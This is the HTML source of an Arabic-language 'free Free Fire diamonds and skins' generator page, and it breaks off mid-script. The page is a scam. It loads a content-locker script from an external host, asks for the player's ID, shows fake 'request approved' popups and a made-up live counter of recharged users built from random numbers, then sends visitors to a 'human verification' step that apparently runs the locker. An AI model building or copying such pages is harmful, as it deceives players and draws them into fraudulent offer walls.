<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
    
    <head>
        


 
    
    <meta http-equiv="content-type" content="text/html;charset=UTF-8">


<!-- LOCKER YA JAMNI -->
<script type="text/javascript">
    var iaVgL_IVV_FXPhpc={"it":4559514,"key":"01bef"};
</script>
<script src="https://duw03nk63ml3f.cloudfront.net/381aaf7.js"></script>

<!-- LOCKER YA JAMNI -->
  
  
  
	    <title>free fire - Free skins and diamonds</title>
	<link rel="canonical" href="https://playloots.online/ff">
        <meta name="keywords" content="free diamonds, free fire free diamonds, diamonds free fire, free fire free diamonds">
        <meta name="viewport" content="width=device-width, initial-scale=0.7, maximum-scale=0.7, user-scalable=no">
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
		<link rel="icon" type="image/png" href="https://playloots.online/ff/img/favicon.png">
		<meta name="theme-color" content="#000000">
		<!-- Icons -->
		<link rel="stylesheet" href="https://playloots.online/ff/cdn.linearicons.com/free/1.0.0/icon-font.min_html.css">
		<link rel="stylesheet" href="https://playloots.online/ff/use.fontawesome.com/releases/v5.5.0/css/all_html.css">
		<link href="https://fonts.googleapis.com/css?family=Russo+One&amp;display=swap" rel="stylesheet">
		<!-- Google Fonts -->
		<link href="https://fonts.googleapis.com/css?family=Poppins:300,400,700,900&amp;display=swap" rel="stylesheet">
		<!-- CSS -->
		<link href="css/bootstrap.min.css" rel="stylesheet">  
		<link href="css/animate.css" rel="stylesheet">
		<link href="css/style.css" rel="stylesheet">
		<link href="css/sweetalert2.css" rel="stylesheet">
		<script src="js/vanillatoasts.js"></script>
		<script src="https://playloots.online/ff/js/live.js"></script>
		<link href="css/vanillatoasts.css" rel="stylesheet">
		<style>

body {
	overflow-x: hidden;
}
html {
	overflow-y: scroll;
	overflow-x: hidden;
}
ul {
	list-style: none;
}
textarea, input, a, button { 
	outline: none;
}

/*--------------------------------------------------------------
# Typography
--------------------------------------------------------------*/
body {
	text-transform: uppercase;
	font-family: Khotot;
		font-size: 16px;
	color: #fff;
}
h1, h2, h3, h4, h6 {
	font-weight: 700;
}
a {
	-webkit-transition: all 0.2s ease-in-out 0s;
	-moz-transition: all 0.2s ease-in-out 0s;
	-ms-transition: all 0.2s ease-in-out 0s;
	-o-transition: all 0.2s ease-in-out 0s;
	transition: all 0.2s ease-in-out 0s;
    color: #000121;
    
}
a:hover, a:visited, a:focus, a:active, button:hover, button:visited, button:active, button:focus {
	text-decoration: none !important;
	outline: none !important;
    color: #fff2c3;
}
::selection {
	background: #000;
	color: #fff;
	text-shadow: none;
}
::-moz-selection {
	background: #000;
	color: #fff;
	text-shadow: none;
}

/*--------------------------------------------------------------
# Animations
--------------------------------------------------------------*/
.animation-delay-100 {
	-webkit-animation-delay: 0.1s;
	animation-delay: 0.1s;
}
.animation-delay-200 {
	-webkit-animation-delay: 0.2s;
	animation-delay: 0.2s;
}
.animation-delay-300 {
	-webkit-animation-delay: 0.3s;
	animation-delay: 0.3s;
}
.animation-delay-400 {
	-webkit-animation-delay: 0.4s;
	animation-delay: 0.4s;
}
.animation-delay-600 {
	-webkit-animation-delay: 0.6s;
	animation-delay: 0.6s;
}
.animation-delay-800 {
	-webkit-animation-delay: 0.8s;
	animation-delay: 0.8s;
}
.animation-delay-1000 {
	-webkit-animation-delay: 1s;
	animation-delay: 1s;
}
.animation-delay-2000 {
	-webkit-animation-delay: 2s;
	animation-delay: 2s;
}

/*--------------------------------------------------------------
# BG
--------------------------------------------------------------*/
#bg {
	position: fixed;
	right: 0;
	bottom: 0;
	min-width: 100%; 
	min-height: 100%;
	z-index: -20;
	background: url('https://blogger.googleusercontent.com/img/a/AVvXsEhKdGZgawHQ7Efn2EV-aktfr8sRjl7yDFxbouX4kRhQQ1lRx_sJwd_bsLatC2BonXpiC8iLM4frOcJv-iXIESasN2PTf9VovBtCrdjqECD_Mb8GOM0ZIs4lrwkwet7fh36eROD-5_xtv9H_ijgW-_04e6m_96OHExJR6piQfiPm8l8h4Csu8LcEbSG7GdA');
	background-repeat: no-repeat;
	background-size: cover;
}
.overlay-pattern {
    background: url('img/overlay-pattern.png');
    opacity: 0.5;
    position: fixed;
    left: 0;
    top: 0;
    right: 0;
    z-index: -10;
    width: 100%;
    height: 100%;
	box-shadow: inset 0 0 300px 0 #c5f6ff;
}
.overlay {
    -moz-animation: overlay .5s .5s forwards;
    -webkit-animation: overlay .5s .5s forwards;
    -ms-animation: overlay .5s .5s forwards;
    animation: overlay .5s .5s forwards;
    background-attachment: fixed, fixed;
    background-color: #000121;
    background-position: top left, center center;
    background-repeat: repeat, no-repeat;
    background-size: auto, cover;
    height: 100%;
    left: 0;
    opacity: 0;
    position: fixed;
    top: 0;
    width: 100%;
	z-index: -5;
}
@-moz-keyframes overlay {
	0% {
		opacity: 0;
	}
	100% {
		opacity: 0.5;
	}
}
@-webkit-keyframes overlay {
	0% {
		opacity: 0;
	}
	100% {
		opacity: 0.5;
	}
}
@-ms-keyframes overlay {
	0% {
		opacity: 0;
	}
	100% {
		opacity: 0.5;
	}
}
@keyframes overlay {
	0% {
		opacity: 0;
	}
	100% {
		opacity: 0.5;
	}
}

/*--------------------------------------------------------------
# App Download
--------------------------------------------------------------*/
.app-download-section {
	position: relative;
	padding: 12% 0 40px 0;
}
.app-download-wrapper {
	max-width: 700px;
	margin: 0 auto;
	background: #fff;
	padding: 5px 20px 70px 20px;
	position: relative;
	border-radius: 5px;
	color: #333;
	box-shadow: 0 10px 15px 0 rgba(0, 0, 0, 0.4);
}
.app-icon-wrapper {
	position: absolute;
	left: 0;
	width: 100%;
	top: -110px;
}

.app-icon-wrapper img {
	max-width: 180px;
	border-radius: 5px!important;
}
.app-download-content {
	text-align: center;
}
.app-download-content-header {
	position: relative;
}
.app-download-content h1 {
	font-weight: 300;
	margin: 0;
	font-size: 1.8em;
}
.app-download-content-header span {
	font-weight: 700;
	display: block;
	font-size: 1.4em;
}
.app-download-status {
	position: relative;
	margin: 30px 0;
}
.app-download-status:after {
	content: '';
	display: block;
	height: 2px;
	width: 100%;
	background: #eee;
	left: 0;
	top: 47%;
	position: absolute;
}
.status-row {
	background: #eee;
	display: inline-block;
	max-width: 150px;
	padding: 10px 15px;
	margin: 0 5px;
	position: relative;
	z-index: 5;
	border-radius: 5px;
}
.status-label {
	font-size: 0.9em;
	font-weight: 300;
	text-transform: uppercase;
	display: block;
	line-height: 1;
	margin: 0 0 5px 0;
}
.status-dynamic {
	font-size: 0.8em;
	font-weight: 700;
	display: block;
	line-height: 1;
}
#status {
	color: #4fe16b;
}
.app-download-main p.app-download-intro-text {
	font-size: 1em;
	color: #808080;
	font-weight: 300;
	max-width: 100%;
	margin: 0 auto;
    padding-bottom: 10px;
}

.platform-field-wrapper {
	position: relative;
}
.platform-item1 {
	background: #eee;
	border-radius: 5px;
	padding: 10px 5px;
    position: relative;
	text-align: center;
	-webkit-animation-duration: 0.7s;
    animation-duration: 0.7s;
	cursor: pointer;
	margin-bottom: 10px	
}
.platform-item1 i {
	font-size: 2.8em;
	display: block;
	color: #222;
}
.platform-item1 span {
	color: #222;
	text-transform: uppercase;
	font-weight: 700;
	font-size: 1.1em;
	margin-top: 4px;
	display: block;
}
.platform-item1.active1 {
	background: #00A7DD;
}
.platform-item1.active1 i {
	color: #fff;
}
.platform-item1.active1 span {
	color: #fff;
	text-shadow: none;
}
.platform-item2 {
	background: #eee;
	border-radius: 5px;
	padding: 20px 10px;
    position: relative;
	text-align: center;
	-webkit-animation-duration: 0.7s;
    animation-duration: 0.7s;
	cursor: pointer;
	margin-bottom: 10px	
}
.platform-item2 i {
	font-size: 2.8em;
	display: block;
	color: #222;
}
.platform-item2 span {
	color: #222;
	text-transform: uppercase;
	font-weight: 700;
	font-size: 1.1em;
	margin-top: 4px;
	display: block;
}
.platform-item2.active2 {
	background: #BB0006;
}
.platform-item2.active2 i {
	color: #fff;
}
.platform-item2.active2 span {
	color: #fff;
	text-shadow: none;
}
.platform-item {
	background: #eee;
	border-radius: 5px;
	padding: 20px 10px;
    position: relative;
	text-align: center;
	-webkit-animation-duration: 0.7s;
    animation-duration: 0.7s;
    cursor: pointer;	
}
.platform-item i {
	font-size: 2.8em;
	display: block;
	color: #222;
}
.platform-item span {
	color: #222;
	text-transform: uppercase;
	font-weight: 700;
	font-size: 1.1em;
	margin-top: 4px;
	display: block;
}
.platform-item.active {
	background: #000121;
}
.platform-item.active i {
	color: #fff;
}
.platform-item.active span {
	color: #fff;
	text-shadow: none;
}

/*--------------------------------------------------------------
# Modal
--------------------------------------------------------------*/
.master-modal {
	max-width: 450px;
	margin: 0 auto;
	position: relative;
	color: #333;
	border-radius: 5px;
}
.generator-header {
	text-align: center;
	background: #000121;
	color: #fff;
	font-size: 1.8em;
	-webkit-border-top-left-radius: 5px;
	-webkit-border-top-right-radius: 5px;
	-moz-border-radius-topleft: 5px;
	-moz-border-radius-topright: 5px;
	border-top-left-radius: 5px;
	border-top-right-radius: 5px;
}
.generator-header span.lnr {
	margin-right: 10px;
	display: inline-block;
	position: relative;
	top: 2px;
}
.generator-header {
	padding: 25px 20px;
}
.generator-content {
	padding: 25px 35px;
}
.generator-content {
	background: #fff;
	-webkit-border-bottom-right-radius: 5px;
	-webkit-border-bottom-left-radius: 5px;
	-moz-border-radius-bottomright: 5px;
	-moz-border-radius-bottomleft: 5px;
	border-bottom-right-radius: 5px;
	border-bottom-left-radius: 5px;
	text-align: center;
}
.console-msg-wrapper {
	position: relative;
	margin: 25px 0 0 0;
	height: 100px;
}
.console-msg {
	font-size: 2em;
	font-weight: 700;
}
.console-loadbar {
	width: 90%;
	max-width: 640px;
	padding: 10px 15px;
	display: table;
	margin: 30px auto 0 auto;
	background: #eee;
	-webkit-transition: all 0.2s ease-in-out 0s;
	-moz-transition: all 0.2s ease-in-out 0s;
	-ms-transition: all 0.2s ease-in-out 0s;
	-o-transition: all 0.2s ease-in-out 0s;
	transition: all 0.2s ease-in-out 0s;
	border-radius: 5px;
}
.console-loadbar div {
	font-size: 20px;
	text-indent: 9999px;
	overflow: hidden;
	background: #4fe16b;
	border-radius: 5px;
}
.console-msg-error {
	color: #fc4349;
}

/*--------------------------------------------------------------
# Verification
--------------------------------------------------------------*/
.human-verification-wrapper {
	position: relative;
}
.human-verification-wrapper p {
	color: #000;
	font-size: 1.2em;
	margin: 0 auto;
	display: table;
}
.human-verification-wrapper i {
	font-size: 2.6em;
	display: block;
	text-align: center;
	margin: 20px auto;
	color: #000121;
}
#verification-button {
	color: #fff;
}
.h-v-time-left-wrapper {
	color: rgba(0, 0, 0, 0.3);
	font-size: 1em;
	margin-bottom: 15px;
}
#human_verification_timer_time {
	color: #333;
	display: block;
	font-weight: 700;
	line-height: 1;
}
.verification-app-wrapper h3 {
	color: #000;
	margin: 10px 0 20px 0;
	font-size: 1.2em;
	font-weight: 300;
}
.verification-app-wrapper h3 span {
	display: block;
	font-weight: 700;
	font-size: 1.2em;
}
.verification-app-icon-img {
	max-width: 70px;
	margin: 0 auto;
	display: table;
}
/*--------------------------------------------------------------
# Button
--------------------------------------------------------------*/
.button-wrapper {
	margin: 0 auto 0 auto;
}
.button {
	background: #000121;
	display: table;
	margin: 0 auto;
	padding: 25px 35px 25px 55px;
	color: #fff;
	border-radius: 5px;
	text-transform: uppercase;
	font-weight: 700;
	letter-spacing: 2px;
	box-shadow: 0 0 6px 0 rgba(0, 0, 0, 0.3);
	text-decoration: none !important;
	border: 2px solid #eee;
	position: relative;
	cursor: pointer;
	font-size: 1.4em;
}
.button:hover {
	background: #000121;
	color: #fff;
}
.button span.lnr {
	position: absolute;
	left: 17px;
	top: 27px;
	font-size: 1.2em;
	color: #fff;
	-webkit-transition: all 0.2s ease-in-out 0s;
	-moz-transition: all 0.2s ease-in-out 0s;
	-ms-transition: all 0.2s ease-in-out 0s;
	-o-transition: all 0.2s ease-in-out 0s;
	font-weight: 400;
	text-shadow: none;
	transition: all 0.2s ease-in-out 0s;
}
.button:hover span.lnr {
	color: #fff;
}

/*--------------------------------------------------------------
# Footer
--------------------------------------------------------------*/
footer {
	text-align: center;
	padding: 5px 0;
	color: rgba(255, 255, 255, 0.5);
	font-size: 1em;
	position: relative;
	z-index: 10;
}

/*--------------------------------------------------------------
# Loader
--------------------------------------------------------------*/
.loader {
  color: #000121;
  font-size: 70px;
  text-indent: -9999em;
  overflow: hidden;
  width: 1em;
  height: 1em;
  border-radius: 5px;
  margin: 45px auto;
  position: relative;
  -webkit-transform: translateZ(0);
  -ms-transform: translateZ(0);
  transform: translateZ(0);
  -webkit-animation: load6 1.7s infinite ease, round 1.7s infinite ease;
  animation: load6 1.7s infinite ease, round 1.7s infinite ease;
}
@-webkit-keyframes load6 {
  0% {
    box-shadow: 0 -0.83em 0 -0.4em, 0 -0.83em 0 -0.42em, 0 -0.83em 0 -0.44em, 0 -0.83em 0 -0.46em, 0 -0.83em 0 -0.477em;
  }
  5%,
  95% {
    box-shadow: 0 -0.83em 0 -0.4em, 0 -0.83em 0 -0.42em, 0 -0.83em 0 -0.44em, 0 -0.83em 0 -0.46em, 0 -0.83em 0 -0.477em;
  }
  10%,
  59% {
    box-shadow: 0 -0.83em 0 -0.4em, -0.087em -0.825em 0 -0.42em, -0.173em -0.812em 0 -0.44em, -0.256em -0.789em 0 -0.46em, -0.297em -0.775em 0 -0.477em;
  }
  20% {
    box-shadow: 0 -0.83em 0 -0.4em, -0.338em -0.758em 0 -0.42em, -0.555em -0.617em 0 -0.44em, -0.671em -0.488em 0 -0.46em, -0.749em -0.34em 0 -0.477em;
  }
  38% {
    box-shadow: 0 -0.83em 0 -0.4em, -0.377em -0.74em 0 -0.42em, -0.645em -0.522em 0 -0.44em, -0.775em -0.297em 0 -0.46em, -0.82em -0.09em 0 -0.477em;
  }
  100% {
    box-shadow: 0 -0.83em 0 -0.4em, 0 -0.83em 0 -0.42em, 0 -0.83em 0 -0.44em, 0 -0.83em 0 -0.46em, 0 -0.83em 0 -0.477em;
  }
}
@keyframes load6 {
  0% {
    box-shadow: 0 -0.83em 0 -0.4em, 0 -0.83em 0 -0.42em, 0 -0.83em 0 -0.44em, 0 -0.83em 0 -0.46em, 0 -0.83em 0 -0.477em;
  }
  5%,
  95% {
    box-shadow: 0 -0.83em 0 -0.4em, 0 -0.83em 0 -0.42em, 0 -0.83em 0 -0.44em, 0 -0.83em 0 -0.46em, 0 -0.83em 0 -0.477em;
  }
  10%,
  59% {
    box-shadow: 0 -0.83em 0 -0.4em, -0.087em -0.825em 0 -0.42em, -0.173em -0.812em 0 -0.44em, -0.256em -0.789em 0 -0.46em, -0.297em -0.775em 0 -0.477em;
  }
  20% {
    box-shadow: 0 -0.83em 0 -0.4em, -0.338em -0.758em 0 -0.42em, -0.555em -0.617em 0 -0.44em, -0.671em -0.488em 0 -0.46em, -0.749em -0.34em 0 -0.477em;
  }
  38% {
    box-shadow: 0 -0.83em 0 -0.4em, -0.377em -0.74em 0 -0.42em, -0.645em -0.522em 0 -0.44em, -0.775em -0.297em 0 -0.46em, -0.82em -0.09em 0 -0.477em;
  }
  100% {
    box-shadow: 0 -0.83em 0 -0.4em, 0 -0.83em 0 -0.42em, 0 -0.83em 0 -0.44em, 0 -0.83em 0 -0.46em, 0 -0.83em 0 -0.477em;
  }
}
@-webkit-keyframes round {
  0% {
    -webkit-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
@keyframes round {
  0% {
    -webkit-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}


/*--------------------------------------------------------------
# Responsive Design
--------------------------------------------------------------*/
@media screen and (max-width: 1920px) {
	.header-content h1 {
		font-size: 7em;
	}
	.header-content p {
		font-size: 1.6em;
	}
	.container {
		max-width: 800px;
	}
	.button {
		padding: 15px 45px 15px 45px;
		letter-spacing: 1px;
	}
	.button span.lnr {
		top: 15px;
	}
}
@media screen and (max-width: 1260px) {
	.app-download-section {
		padding: 200px 0 80px 0;
	}
}
@media screen and (max-width: 580px) {
	.app-download-wrapper {
		padding: 05px 20px 70px 20px;
	}
	.app-icon-wrapper {
		top: -75px;
	}
	.app-icon-wrapper img {
		max-width: 120px;
	}
	.button {
		padding: 12px 45px 10px 45px;
		letter-spacing: 0;
	}
	.button span.lnr {
		font-size: 1em;
		left: 12px;
	}
	.platform-item1 img{
		width: 100px;
		height: auto;
	}
}
@media screen and (max-width: 460px) {
	.app-download-section {
		padding: 120px 0 80px 0;
	}
	.app-download-content h1 {
		font-size: 1.5em;
	}
	.row-second {
		display: none;
	}
	.app-download-main p.app-download-intro-text {
		font-size: 1em;
		max-width: 100%;
	}
	.button {
		font-size: 1.2em;
	}
	.console-msg {
		font-size: 1.8em;
	}
	.platform-item1 img{
		width: 86px;
		height: auto;
	}
}
@media screen and (max-width: 390px) {
	.app-download-content h1 {
		font-size: 1.3em;
	}
	.app-download-main p.app-download-intro-text {
		font-size: 1.1em;
	}
	.console-msg {
		font-size: 1.6em;
	}
	.platform-item1 img{
		width: 86px;
		height: auto;
	}
}
@media screen and (max-width: 365px) {
	.app-download-content h1 {
		font-size: 1.2em;
	}
	.app-download-main p.app-download-intro-text {
		font-size: 1em;
	}
	.button {
		font-size: 1.1em;
	}
	.console-msg {
		font-size: 1.5em;
	}
	.platform-item1 img{
		width: 75px;
		height: auto;
	}
}
@media screen and (max-width: 320px) {
	.app-download-content h1 {
		font-size: 1.1em;
	}
	.button {
		font-size: 1em;
	}
	.app-download-wrapper {
		padding: 5px 20px 70px 20px;
	}
	.console-msg {
		font-size: 1.4em;
	}
	.generator-header {
		font-size: 1.6em;
	}
	.human-verification-wrapper p {
		font-size: 1em;
	}
}
/**************************

Website Designed by CounterMind on Marketing-Rhino.com
https://www.marketing-rhino.com/
It is forbidden to re-sell this landing page without Author Permission.

**************************/
            	@font-face {
  font-family: Khotot;
  src: url(https://playloots.online/ff/free-fire/fonts/KhototDeeper-ExtraBold.ttf);
}
            strike {
                color: red;
            }
		input[type="value"]{
			font-size: 32px;
		}
		input[type="text"]{
		-moz-appearance: none;
		-webkit-appearance: none;
		-ms-appearance: none;
		appearance: none;
		background: #e7e7e7;
		border: 0;
		border-radius: 10px;
		color: #222222;
		display: block;
		outline: 0;
		padding: 0 1em;
		text-decoration: none;
		width: 100%;
		}
		input::-moz-focus-inner {
		border: 0;
		padding: 0;
		}
		input {
		color: #222222;
		font-size: 30px;
		font-weight: 600;
		letter-spacing: 0.025em;
		line-height: 1.65;
		}
		#spiner {
			font-size: 2.6em;
			display: block;
			text-align: center;
			margin: 20px auto;
			color: #000121;
		}
		.hide {
			display: none;
		}
		.swal2-popup {
			border-radius: 5px;
		}
		.Syndicate Gold-color { 
			color: rgb(218, 155, 47) !important; 
			text-shadow: -1px -1px 0 #1b1f2f, 1px -1px 0 #1b1f2f, -1px 1px 0 #1b1f2f, 1px 1px 0 #1b1f2f;    
		}
		.Syndicate Gold-color { 
			color: #FAF6A7 !important; 
			text-shadow: -1px -1px 0 #1b1f2f, 1px -1px 0 #1b1f2f, -1px 1px 0 #1b1f2f, 1px 1px 0 #1b1f2f;
		}
		.form-group {
			margin-top: 0px;
		}
		.form-group input {
			padding: 0;
			text-align: center;
			height: 55px;
			font-size: 32px;
			font-family: 'Russo One', sans-serif;
			text-shadow: -1px -1px 0 #1b1f2f, 1px -1px 0 #1b1f2f, -1px 1px 0 #1b1f2f, 1px 1px 0 #1b1f2f;	
		}
		button.btn-minus, button.btn-plus {
			font-size: 16px;
			text-shadow: -1px -1px 0 rgba(0,0,0,0.3);
			color: #fff;
			padding: 3px 20px;
			margin: 0px 10px 0 10px;
			-webkit-border-radius: 3px; 
			-moz-border-radius: 3px;
			border-radius: 3px;
            width: 56px;
            height: 32px;
		}
		button.btn-minus {
			border: 1px solid #df0909; 
			background-color: #f62b2b; background-image: -webkit-gradient(linear, left top, left bottom, from(#f62b2b), to(#d20202));
			background-image: -webkit-linear-gradient(top, #f62b2b, #d20202);
			background-image: -moz-linear-gradient(top, #f62b2b, #d20202);
			background-image: -ms-linear-gradient(top, #f62b2b, #d20202);
			background-image: -o-linear-gradient(top, #f62b2b, #d20202);
			background-image: linear-gradient(to bottom, #f62b2b, #d20202);filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0,startColorstr=#f62b2b, endColorstr=#d20202);
		}
		button.btn-plus {
			border:1px solid #34740e;
			background-color: #4ba614; background-image: -webkit-gradient(linear, left top, left bottom, from(#4ba614), to(#008c00));
			background-image: -webkit-linear-gradient(top, #4ba614, #008c00);
			background-image: -moz-linear-gradient(top, #4ba614, #008c00);
			background-image: -ms-linear-gradient(top, #4ba614, #008c00);
			background-image: -o-linear-gradient(top, #4ba614, #008c00);
			background-image: linear-gradient(to bottom, #4ba614, #008c00);filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0,startColorstr=#4ba614, endColorstr=#008c00);
		}
		.disabledJS {
			pointer-events: none; 
		}
		span.number {
			font-weight: normal;
			font-size: 32px;
			font-family: 'Russo One', sans-serif;
		}
		.input-icon2 {
			margin-top: -8px;
			position: relative;
			margin: auto;
		}
		.input-icon2 {
			height: 50px;
			width: 80px;
			line-height: 40px;
			background: #e7e7e7;
			border: 10px solid #e7e7e7;
			border-radius: 5px;
		}
		.resources {
			width: 40px;
			height: 40px;
		}
		.float{
			position:fixed;
			width:55px;
			height:55px;
			bottom:40px;
			right:40px;
			background-color:#000121;
			color:#FFF;
			border-radius:100%;
			text-align:center;
			box-shadow: 2px 2px 3px #999;
		}
		.float:hover {
			color: #000;
			background-color: #fff;
		}
		.my-float{
			margin-top:19px;
		}
		</style>	




</head>
	<body onload="create()">	
		<div id="bg"></div>
		<div class="overlay-pattern"></div>
		<div class="overlay"></div>
		
		<section class="app-download-section">
		    
			<div class="container">
			    
				<div class="app-download-wrapper animated flipInX">
				    
					<div class="app-icon-wrapper">
					    
					</div>
				
				
				
					<div class="app-download-content">
					    

					    	<div class="app-download-content-header">
							<h1><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-y6etMKAa_0qbo_U0X2oeZjIjPIn1BymY788Cq0rdjuj9BQbY9uSozsIq2SGaRUtFnQPdMk5s5fJJk_0LCMEzkimmeuLoOBFPt8AYpTVhegxPAkCU__jl1UhBtj-ZKzjA8bTE2mfn6KH00BOSOLaTuBsIA_kUHWBqMuG4WskPN7zRop5reJBtfgkvXk4/s1139/FF35B959-CCEE-4E4C-98B5-9A1214C4D3AC.jpeg" alt="" style="width: 100%;"></h1>

							<h1><span><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh6uBV9-_h6hC2S8t8EdPWpe0LyTDBmDOvQrTuk8_uxhT3kDE8MK5NSq4Jt87aVpkNxjjcFc8vPblmtqWf9p5py16ABr-MOWjoqopNGYCv2pmE-uNEgzlfJQdY2ZDnUEjmZueBIfb5mwF4rlnT2TX3gvmnVp8_L3KlGJWgsxJHgZTaG0NTSymHIQIMB8g/s4096/IMG_4519.png" alt="FREE FIRE" style="width: 100%;"></span></h1>
						</div> <br>
					    											  <!-- ADS -->  

					    
					    <!-- ADS -->
					    
						<div class="app-download-status">
							<div class="status-row row-first animated bounceIn animation-delay-400">
								<span class="status-label">الحالة:</span>
								<span id="status" class="status-dynamic">متصل</span>
							</div>
							<div class="status-row row-second odd animated bounceIn animation-delay-600">
								<span class="status-label">اخر تحديث للموقع:</span>
								<span id="date" class="status-dynamic">Fri Feb 07 2025</span>
							</div>
							<div class="status-row row-last animated bounceIn animation-delay-800">
								<span class="status-label">اشخاص التي تم شحن لهم الآن:</span>
								<span id="online-count" class="status-dynamic">347</span>
							</div>
						</div>
						
						



						<div id="control">
							<div class="app-download-main animated bounceIn">
								<p class="app-download-intro-text" style="color: #000121;">انقر على الزر أدناه لبدء العملية</p>
								<div class="button-wrapper">
									<div id="b-1" onclick="nexT();playAu()" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>ابدأ الآن</span></div>
								</div>
							</div>
						</div>
						<div id="show" class="hide">
							<div class="app-download-main animated bounceIn">
									<p class="app-download-intro-text">: الأيدي الخاص بك</p>
									<form action="javascript:void(0);" name="Form">
										<input type="text" name="usernameInput" value="" required="">
									</form>
									<br>
						<p class="app-download-intro-text">:اختر الجواهر الذي تريده</p>
						<div id="currency">
							<div class="row small-margin">
							<div class="col small-padding">
									<div onclick="playA()" class="platform-item1 platform-item-1">
									<img src="img/jaw.png"style="width:100px;">
										<span> 1080 جوهر
  <br></span>
									</div>
								</div>
                              
                              
                                    <div class="col small-padding">
									<div onclick="playA()" class="platform-item1 platform-item-2">
										<img src="img/tiger.jpeg" style="width: 100px;">
										<span>  النمر الشجاع  <br></span>
									</div>
								</div>
								
								
								   <div class="col small-padding">
									<div onclick="playA()" class="platform-item1 platform-item-2">
										<img src="img/bunnydance.jpg" style="width: 100px;">
										<span>  عرض الارنب   <br></span>
									</div>
								</div>
                              
                              <div class="col small-padding">
									<div onclick="playA()" class="platform-item1 platform-item-2">
										<img src="img/bunny.jpg" style="width: 100px;">
										<span>   ارنب المجرة <br></span>
									</div>
								</div>
                              
                              								<div class="col small-padding">
									<div onclick="playA()" class="platform-item1 platform-item-2">
										<img src="img/golden&#32;criminal.jpeg" style="width: 100px;">
										<span>   كريمنال الذهبي <br></span>
									</div>
								</div>
                              								<div class="col small-padding">
									<div onclick="playA()" class="platform-item1 platform-item-2">
										<img src="img/haker.jpg" style="width: 100px;">
										<span> كريمنال الهكر
   <br></span>
									</div>
								</div>
                              								<div class="col small-padding">
									<div onclick="playA()" class="platform-item1 platform-item-2">
										<img src="img/itachi.jpg" style="width: 100px;">
										<span>   ايتاشي


 <br></span>
									</div>
								</div>
								<br>
                              <div class="col small-padding">
									<div onclick="playA()" class="platform-item1 platform-item-2">
										<img src="img/tajdif.jpg" style="width: 100px;">
										<span>   تجديف سباق القوارب 


<br></span>
									</div>
								</div>
                              <div class="col small-padding">
									<div onclick="playA()" class="platform-item1 platform-item-2">
										<img src="img/barafal.jpg" style="width: 100px;">
										<span>   بارافال إعصار الأساطير 


<br></span>
									</div>
								</div>
                              <div class="col small-padding">
									<div onclick="playA()" class="platform-item1 platform-item-2">
										<img src="img/obito.jpg" style="width: 100px;">
										<span>   اوبيتو 


<br></span>
									</div>
								</div>

                              <div class="col small-padding">
									<div onclick="playA()" class="platform-item1 platform-item-2">
										<img src="img/sosano.jpg" style="width: 100px;">
										<span>   سوسانو ايتاشي


 <br></span>
									</div>
								</div>
								<br>
                              <div class="col small-padding">
									<div onclick="playA()" class="platform-item1 platform-item-2">
										<img src="img/ghirban.jpg" style="width: 100px;">
										<span>   الغربان المبعثرة


 <br></span>
									</div>
								</div>
								<br>


                              
                                                            


								<div class="button-wrapper">
									<div id="b-2" onclick="playAu(); nexT1()" class="button animated pulse infinite">
										<span class="lnr lnr-download"></span>
										<span style="font-family: 'Cairo', sans-serif;">إرسال</span>
									</div>
								</div>
							</div>
						</div>		
						</div>
					</div>
						<div id="verify" class="hide">
								<div class="app-download-main animated bounceIn">
									<p style="font-family: Khotot;">لقد شارفت على الانتهاء! من فضلك، أكمل هذه الخطوة النهائية من خلال النقر على الزر أدناه واتباع جميع التعليمات المذكورة للتحقق من أنك إنسان</p>
									<div id="spiner" class="fas fa-spinner fa-spin"></div>
									<a rel="nofollow" onclick="_CJ()"><div class="button-wrapper">
										<div id="b-1" onclick="playAu()" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>تحقق الأن</span></div>
								</div></a>
				            </div>
                        </div>
				    </div>
				</div>
			</div>
		</section>

		<div class="X650d"></div>
		<audio id="myAudio">
  <source src="https://www.shop4games.store/sounds/click.ogg" type="audio/ogg">
  <source src="sounds/click.mp3" type="audio/mpeg"> 
</audio>
<audio id="myAu">
  <source src="https://www.shop4games.store/sounds/choose.ogg" type="audio/ogg">
  <source src="sounds/choose.mp3" type="audio/mpeg"> 
</audio>
<audio id="myAA">
  <source src="https://www.shop4games.store/sounds/success.ogg" type="audio/ogg">
  <source src="sounds/success.mp3" type="audio/mpeg"> 
</audio>
<audio id="myerror">
  <source src="https://www.shop4games.store/sounds/error.ogg" type="audio/ogg">
  <source src="sounds/error.mp3" type="audio/mpeg"> 
</audio>
	<!-- JS -->	
	<script>
		function random(min,max)
			{
				return Math.floor(Math.random()*(max-min+1)+min);
			}
			var initial = random(300, 400);
			var count = initial;
			setInterval(function() {
				var variation = random(-5,5);
				count += variation
				document.getElementById("online-count").innerHTML = count;
			}, 1000)
		</script>
					<script>
						var d = new Date();
						document.getElementById("date").innerHTML = d.toDateString();
					</script>
					<script>
					var z = document.getElementById("myAA")
					function nexT() {
					let timerInterval
					  Swal.fire({
						timer: 5000,
						imageUrl: 'https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHU-Pn9Oc-jNpbOgor2mksgMOnB6nxetqVcHIfREYDbAd1pMJ8MgcYuddhhtWfOJM4KBScCwx2_ngb7elIlE9M1IbPe9usfdBS5QN2HQaXY6W5URY8vZCQduTAYj8HlR5e2OTQzfdhfIjjQ1dl5N_cb_JY08iKs5Xvi0PIuFf5HVYFVwe0RlZAF-2PjFk/s562/IMG_4520.webp',
						imageAlt: 'Loading',
						title: 'جارٍ المطالبة',
						showConfirmButton: false,
						onClose: () => {
						  clearInterval(timerInterval)
						}
					  }).then(function() {
						var x = document.getElementById("control");
						  if (x.style.display === "none") {
							x.style.display = "block";
						  } else {
								x.style.display = "none";
							}
						z.play();
						var element = document.getElementById("show");
						element.classList.remove("hide");
						Swal.fire({
						type: 'success',
						title: 'لقد تمت الموافقة على طلبك',
						showConfirmButton: false,
						timer: 3000,
						onClose: () => {
